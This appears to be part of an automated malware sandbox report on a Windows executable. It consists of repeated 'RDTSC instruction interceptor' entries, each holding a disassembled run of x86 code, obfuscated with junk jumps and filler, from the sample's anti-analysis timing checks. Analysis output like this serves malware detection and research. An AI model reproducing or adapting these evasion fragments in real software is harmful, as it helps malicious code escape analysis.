Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430508 second address: 7430536 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b pushad 0x0000000c mov esi, edi 0x0000000e push eax 0x0000000f push edx 0x00000010 call 00007F577C53EFD7h 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430536 second address: 7430576 instructions: 0x00000000 rdtsc 0x00000002 mov dx, 91BCh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov dword ptr [esi], edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov dh, al 0x00000010 pushfd 0x00000011 jmp 00007F577C5415D9h 0x00000016 adc cl, FFFFFFC6h 0x00000019 jmp 00007F577C5415D1h 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430576 second address: 743057C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 743057C second address: 7430580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430580 second address: 74305E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+04h], eax 0x0000000e jmp 00007F577C53EFD6h 0x00000013 mov dword ptr [esi+08h], eax 0x00000016 jmp 00007F577C53EFD0h 0x0000001b mov dword ptr [esi+0Ch], eax 0x0000001e pushad 0x0000001f mov cx, 750Dh 0x00000023 mov esi, 386B5509h 0x00000028 popad 0x00000029 mov eax, dword ptr [ebx+4Ch] 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F577C53EFCBh 0x00000033 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74305E3 second address: 7430628 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+10h], eax 0x0000000c jmp 00007F577C5415CEh 0x00000011 mov eax, dword ptr [ebx+50h] 0x00000014 pushad 0x00000015 mov di, cx 0x00000018 mov si, B2C9h 0x0000001c popad 0x0000001d mov dword ptr [esi+14h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push edx 0x00000024 pop ecx 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430628 second address: 743066D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+54h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F577C53EFCEh 0x00000013 xor ecx, 62152978h 0x00000019 jmp 00007F577C53EFCBh 0x0000001e popfd 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 743066D second address: 7430671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430671 second address: 7430692 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 693780CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esi+18h], eax 0x0000000d jmp 00007F577C53EFCEh 0x00000012 mov eax, dword ptr [ebx+58h] 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430692 second address: 7430696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430696 second address: 743071D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov bh, C1h 0x00000008 popad 0x00000009 mov dword ptr [esi+1Ch], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F577C53EFCEh 0x00000013 jmp 00007F577C53EFD5h 0x00000018 popfd 0x00000019 mov ah, 8Ah 0x0000001b popad 0x0000001c mov eax, dword ptr [ebx+5Ch] 0x0000001f jmp 00007F577C53EFD3h 0x00000024 mov dword ptr [esi+20h], eax 0x00000027 pushad 0x00000028 jmp 00007F577C53EFD4h 0x0000002d push eax 0x0000002e push edx 0x0000002f pushfd 0x00000030 jmp 00007F577C53EFD0h 0x00000035 and ax, CA28h 0x0000003a jmp 00007F577C53EFCBh 0x0000003f popfd 0x00000040 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 743071D second address: 743072D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 0621031Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [ebx+60h] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 743072D second address: 7430786 instructions: 0x00000000 rdtsc 0x00000002 mov si, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F577C53EFD9h 0x0000000d add eax, 291780F6h 0x00000013 jmp 00007F577C53EFD1h 0x00000018 popfd 0x00000019 popad 0x0000001a mov dword ptr [esi+24h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F577C53EFD8h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430786 second address: 743078C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 743078C second address: 7430792 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430792 second address: 7430796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430796 second address: 74307E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+64h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007F577C53EFD1h 0x00000013 pop eax 0x00000014 pushfd 0x00000015 jmp 00007F577C53EFD1h 0x0000001a xor cx, A516h 0x0000001f jmp 00007F577C53EFD1h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74307E0 second address: 74307E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 743099A second address: 743099E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 743099E second address: 74309AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [ebx+18h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74309AE second address: 74309B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74309B4 second address: 74309CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+38h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx edi, si 0x00000012 movzx eax, di 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74309CF second address: 74309F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F577C53EFCEh 0x00000009 or eax, 591D84E8h 0x0000000f jmp 00007F577C53EFCBh 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74309F5 second address: 7430A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [ebx+1Ch] 0x0000000a jmp 00007F577C5415D4h 0x0000000f mov dword ptr [esi+3Ch], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430A1C second address: 7430A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430A20 second address: 7430A24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430A24 second address: 7430A2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430A2A second address: 7430A89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F577C5415D2h 0x00000009 sbb esi, 7DD659A8h 0x0000000f jmp 00007F577C5415CBh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F577C5415D8h 0x0000001b or eax, 605FCC08h 0x00000021 jmp 00007F577C5415CBh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a mov eax, dword ptr [ebx+20h] 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430A89 second address: 7430A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430A8D second address: 7430A91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430A91 second address: 7430A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430A97 second address: 7430B6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F577C5415D8h 0x00000009 sub esi, 0591C198h 0x0000000f jmp 00007F577C5415CBh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F577C5415D8h 0x0000001b sbb al, FFFFFFF8h 0x0000001e jmp 00007F577C5415CBh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 mov dword ptr [esi+40h], eax 0x0000002a pushad 0x0000002b mov edx, eax 0x0000002d pushfd 0x0000002e jmp 00007F577C5415D0h 0x00000033 and cx, C658h 0x00000038 jmp 00007F577C5415CBh 0x0000003d popfd 0x0000003e popad 0x0000003f lea eax, dword ptr [ebx+00000080h] 0x00000045 jmp 00007F577C5415D6h 0x0000004a push 00000001h 0x0000004c pushad 0x0000004d mov ecx, ebx 0x0000004f popad 0x00000050 push edx 0x00000051 jmp 00007F577C5415D4h 0x00000056 mov dword ptr [esp], eax 0x00000059 jmp 00007F577C5415D0h 0x0000005e lea eax, dword ptr [ebp-10h] 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430B6C second address: 7430B72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430B72 second address: 7430B78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430B78 second address: 7430B7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430B7C second address: 7430B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430B8B second address: 7430B8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430B8F second address: 7430B93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430B93 second address: 7430B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430B99 second address: 7430C0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F577C5415CBh 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F577C5415CBh 0x00000019 adc si, 029Eh 0x0000001e jmp 00007F577C5415D9h 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007F577C5415D0h 0x0000002a sbb eax, 38B65498h 0x00000030 jmp 00007F577C5415CBh 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430C0A second address: 7430C22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F577C53EFD4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430CCA second address: 7430CE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430CE5 second address: 7430D14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F577C53EFCDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430D14 second address: 7430D1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430E82 second address: 7430F44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F577C53EFD8h 0x00000009 or cx, BC28h 0x0000000e jmp 00007F577C53EFCBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 test edi, edi 0x00000019 jmp 00007F577C53EFD5h 0x0000001e js 00007F57EC0AD7B6h 0x00000024 jmp 00007F577C53EFCEh 0x00000029 mov eax, dword ptr [ebp-04h] 0x0000002c jmp 00007F577C53EFD0h 0x00000031 mov dword ptr [esi+08h], eax 0x00000034 jmp 00007F577C53EFD0h 0x00000039 lea eax, dword ptr [ebx+70h] 0x0000003c pushad 0x0000003d movzx esi, dx 0x00000040 mov dh, B8h 0x00000042 popad 0x00000043 push 00000001h 0x00000045 jmp 00007F577C53EFD2h 0x0000004a nop 0x0000004b pushad 0x0000004c mov bx, cx 0x0000004f jmp 00007F577C53EFCAh 0x00000054 popad 0x00000055 push eax 0x00000056 jmp 00007F577C53EFCBh 0x0000005b nop 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f mov di, si 0x00000062 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430F44 second address: 7430FAC instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov di, 42EEh 0x0000000b popad 0x0000000c lea eax, dword ptr [ebp-18h] 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F577C5415CBh 0x00000016 jmp 00007F577C5415D3h 0x0000001b popfd 0x0000001c call 00007F577C5415D8h 0x00000021 pushad 0x00000022 popad 0x00000023 pop esi 0x00000024 popad 0x00000025 push eax 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F577C5415D8h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430FAC second address: 7430FB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430FB0 second address: 7430FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edi, eax 0x00000008 popad 0x00000009 mov dword ptr [esp], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430FC2 second address: 7430FD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430FD1 second address: 7430FD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430FD7 second address: 7430FDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7430FF7 second address: 743103B instructions: 0x00000000 rdtsc 0x00000002 mov ecx, edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F577C5415D3h 0x0000000b popad 0x0000000c mov edi, eax 0x0000000e pushad 0x0000000f mov ebx, esi 0x00000011 push esi 0x00000012 call 00007F577C5415D7h 0x00000017 pop eax 0x00000018 pop edx 0x00000019 popad 0x0000001a test edi, edi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov bh, 6Eh 0x00000021 push eax 0x00000022 pop edx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 743103B second address: 74310E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, C1h 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F57EC0AD630h 0x00000010 pushad 0x00000011 push ecx 0x00000012 pushfd 0x00000013 jmp 00007F577C53EFCFh 0x00000018 sub eax, 0690B93Eh 0x0000001e jmp 00007F577C53EFD9h 0x00000023 popfd 0x00000024 pop esi 0x00000025 movsx edi, ax 0x00000028 popad 0x00000029 mov eax, dword ptr [ebp-14h] 0x0000002c pushad 0x0000002d movzx esi, bx 0x00000030 mov bh, F3h 0x00000032 popad 0x00000033 mov ecx, esi 0x00000035 pushad 0x00000036 mov si, F46Fh 0x0000003a jmp 00007F577C53EFD4h 0x0000003f popad 0x00000040 mov dword ptr [esi+0Ch], eax 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 mov edi, 294EEAB0h 0x0000004b pushfd 0x0000004c jmp 00007F577C53EFD9h 0x00000051 xor ax, 0636h 0x00000056 jmp 00007F577C53EFD1h 0x0000005b popfd 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74310E5 second address: 7431126 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, 770206ECh 0x0000000e jmp 00007F577C5415CEh 0x00000013 sub eax, eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F577C5415D3h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7431126 second address: 7431143 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7431143 second address: 7431175 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock cmpxchg dword ptr [edx], ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F577C5415D3h 0x00000015 mov dh, ch 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7431175 second address: 743118A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F577C53EFD1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 743118A second address: 74311CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 jmp 00007F577C5415CDh 0x0000000e test eax, eax 0x00000010 jmp 00007F577C5415CEh 0x00000015 jne 00007F57EC0AFAF2h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F577C5415D7h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74311CF second address: 743122A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+08h] 0x0000000c jmp 00007F577C53EFCEh 0x00000011 mov eax, dword ptr [esi] 0x00000013 jmp 00007F577C53EFD0h 0x00000018 mov dword ptr [edx], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F577C53EFD7h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 743122A second address: 743129F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 mov esi, edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+04h] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F577C5415D3h 0x00000015 sbb si, 3BCEh 0x0000001a jmp 00007F577C5415D9h 0x0000001f popfd 0x00000020 mov ah, B9h 0x00000022 popad 0x00000023 mov dword ptr [edx+04h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F577C5415D4h 0x0000002f adc cx, E778h 0x00000034 jmp 00007F577C5415CBh 0x00000039 popfd 0x0000003a mov dx, ax 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 743129F second address: 74312CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+08h] 0x0000000b jmp 00007F577C53EFD8h 0x00000010 mov dword ptr [edx+08h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov si, dx 0x00000019 mov ecx, edi 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74312CE second address: 7431315 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+0Ch] 0x0000000c jmp 00007F577C5415D0h 0x00000011 mov dword ptr [edx+0Ch], eax 0x00000014 jmp 00007F577C5415D0h 0x00000019 mov eax, dword ptr [esi+10h] 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f mov ecx, 3B1157E3h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7431315 second address: 743137F instructions: 0x00000000 rdtsc 0x00000002 mov edi, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 mov edx, esi 0x00000009 push ecx 0x0000000a pop edx 0x0000000b popad 0x0000000c popad 0x0000000d mov dword ptr [edx+10h], eax 0x00000010 jmp 00007F577C53EFD8h 0x00000015 mov eax, dword ptr [esi+14h] 0x00000018 jmp 00007F577C53EFD0h 0x0000001d mov dword ptr [edx+14h], eax 0x00000020 jmp 00007F577C53EFD0h 0x00000025 mov eax, dword ptr [esi+18h] 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F577C53EFD7h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 743137F second address: 74313F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+18h], eax 0x0000000c pushad 0x0000000d pushad 0x0000000e mov ecx, 6ACA4C19h 0x00000013 jmp 00007F577C5415D6h 0x00000018 popad 0x00000019 pushfd 0x0000001a jmp 00007F577C5415D2h 0x0000001f and ecx, 21C414D8h 0x00000025 jmp 00007F577C5415CBh 0x0000002a popfd 0x0000002b popad 0x0000002c mov eax, dword ptr [esi+1Ch] 0x0000002f pushad 0x00000030 mov cx, 75ABh 0x00000034 pushad 0x00000035 movzx esi, di 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
